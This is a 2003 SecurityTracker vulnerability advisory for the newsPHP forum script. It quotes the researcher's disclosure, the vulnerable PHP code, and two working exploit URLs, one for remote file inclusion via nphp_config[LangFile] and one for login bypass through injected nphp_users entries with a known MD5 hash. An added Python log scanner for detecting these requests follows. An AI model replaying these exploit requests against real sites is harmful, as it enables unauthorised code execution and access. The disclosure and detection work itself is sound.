SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  NewsPHP (nphp.net)
Vendors:  newsPHP Development Team
newsPHP Flaws in 'nphpd' Permit Remote Users to View and Execute Files and Execute Script Functions
SecurityTracker Alert ID:  1007584
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Aug 27 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 216 and prior versions
Description:  A file inclusion vulnerability was reported in newsPHP. A remote user can include arbitrary files on the system to view files and execute code. A remote user can also invoke script functions without authenticating.

It is reported that if 'LangFile' is not set in the config file (which is the default configuration), a remote user can include any existing file on the web server. This is due to a flaw in the 'nphpd.php' script, which can potentially be exploited to view files on the system or to execute PHP code on the system.

A demonstration exploit URL is provided:

http://[host]/nphp/nphpd.php?nphp_config[LangFile]=/evil/file

It is also reported that a remote user can perform various actions on the system without having to authenticate to the system. This can reportedly be achieved by injecting specially crafted data for a fake user. A demonstration exploit is provided:

http://[host]/nphp/?[action here, example: output]&
pword=a&
uname=[fake usernamehere]&
nphp_users[user index here][0]=a&
nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
nphp_users[user index here][3]=5

In the above exploit, md5('a') is '0cc175b9c0f1b6a831c399e269772661'.

Impact:  A remote user can include arbitrary files on the system to view the files or execute PHP files.

A remote user can perform various functions without having to login.

Solution:  No solution was available at the time of this entry.

[Editor's note: The vendor's web site indicates that development of NewsPHP has stopped in favor of a new project, NewsPHP Advanced.]
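
With no fix available, one way to spot requests of the two shapes shown above is to scan web-server access logs for query parameters named after the script's internal arrays. This is an added example, not part of the SecurityTracker entry or of newsPHP; the log format, the sample lines and the function names are assumptions made for the illustration, as is the premise that legitimate requests never carry these parameter names.

```python
import re
from urllib.parse import parse_qsl

# Server-side variables that the advisory shows being supplied through the URL.
INTERNAL_VARS = {"nphp_config", "nphp_users"}

# Request line of a common/combined log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation addresses, made-up user index 7).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Aug/2003:10:00:01 +0000] "GET /nphp/?output HTTP/1.0" 200 512',
    '192.0.2.44 - - [27/Aug/2003:10:00:07 +0000] '
    '"GET /nphp/nphpd.php?nphp_config%5BLangFile%5D=/evil/file HTTP/1.0" 200 90',
    '192.0.2.44 - - [27/Aug/2003:10:00:09 +0000] '
    '"GET /nphp/?output&pword=a&uname=a&nphp_users[7][0]=a&nphp_users[7][1]=x HTTP/1.0" 200 700',
]


def php_base_name(param):
    """Variable name PHP derives from a parameter: the text before the first '[',
    with leading spaces dropped and ' ' or '.' mapped to '_'."""
    head = param.lstrip(" ").partition("[")[0]
    return head.replace(" ", "_").replace(".", "_")


def suspicious_params(log_line):
    """Return the sorted parameter names in one log line that target INTERNAL_VARS."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    # parse_qsl percent-decodes names, so nphp_config%5BLangFile%5D is caught too.
    names = {name for name, _ in parse_qsl(query, keep_blank_values=True)}
    return sorted(n for n in names if php_base_name(n) in INTERNAL_VARS)


def scan(lines):
    """Map 1-based line number -> offending parameter names."""
    findings = {}
    for number, line in enumerate(lines, 1):
        hits = suspicious_params(line)
        if hits:
            findings[number] = hits
    return findings


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(hits)}")
```

Only query strings appear in access logs, so parameters sent in a POST body need the same check at a proxy or application-level log.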

Vendor URL:  www.nphp.net/
Cause:  Authentication error, Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Dariusz 'Officerrr' Kolasinski" <officerrr@poligon.com.pl>
Message History:   None.


 Source Message Contents

Date:  Mon, 25 Aug 2003 05:04:22 +0200
From:  "Dariusz 'Officerrr' Kolasinski" <officerrr@poligon.com.pl>
Subject:  newsPHP file inclusion & bad login validation

 

newsPHP arbitrary file inclusion & bad login validation

===+++===+++===+++
Product: newsPHP
Version: <= v216
Vendor: http://www.nphp.net
Author: Officerrr <officerrr@poligon.com.pl>
Discovered by: Officerrr <officerrr@poligon.com.pl>
Vendor Response: Not contacted yet...
===+++===+++===+++


Problem #1:
===+++===+++===+++
Attacker can include any existing file on the web server,
if the LangFile is not set in config (it is not set by default).


PHP Code/Location #1:
===+++===+++===+++
-- from nphpd.php
[..]
// We know what we are supposed to be doing
// now. Load in a custom language if they
// have it set.
[..]
Oh yeah, we are ;]
[..]
  if(isset($nphp_config["LangFile"]))
  {
   if(strtolower($nphp_config["LangFile"]) != "default" && $nphp_config["LangFile"] != "" && file_exists($nphp_config["LangFile"]))
   {
    include($nphp_config["LangFile"]);
   }
  }
[...]


Exploit #1:
===+++===+++===+++
http://[host]/nphp/nphpd.php?nphp_config[LangFile]=/evil/file


Problem #2:
===+++===+++===+++
User can perform any other action than 'login' without knowing
the password and valid username.


Snip #2:
===+++===+++===+++
md5('a') is '0cc175b9c0f1b6a831c399e269772661'


PHP Code/Location #2:
===+++===+++===+++
-- from nfunc.php
function LoadSettings(&$config, &$users)
[...]
   $users[$id][] = eregi_replace("[\n\r]","",$raw_config_line[$x]);
[...]

-- from nphpd.php
[...]
LoadSettings($nphp_config, $nphp_users);
[...]
for($i = 0; $i < count($nphp_users); $i++)
{
  if((strtolower($nphp_users[$i][0]) == strtolower($uname)) && ($nphp_users[$i][1] == md5($pword)))
  {
[...]
// hmmmm so we can inject users using nphp_users[index] in url


Exploit #2:
===+++===+++===+++
http://[host]/nphp/?[action here, example: output]&
pword=a&
uname=[fake usernamehere]&
nphp_users[user index here][0]=a&
nphp_users[user index here][1]=0cc175b9c0f1b6a831c399e269772661&
nphp_users[user index here][3]=5

--
Regards,
Dariusz 'Officerrr' Kolasinski
[Linux Administrator]
[gg: 516354] [uin: 83041742]
"Silent my voice, I've got no choice..."

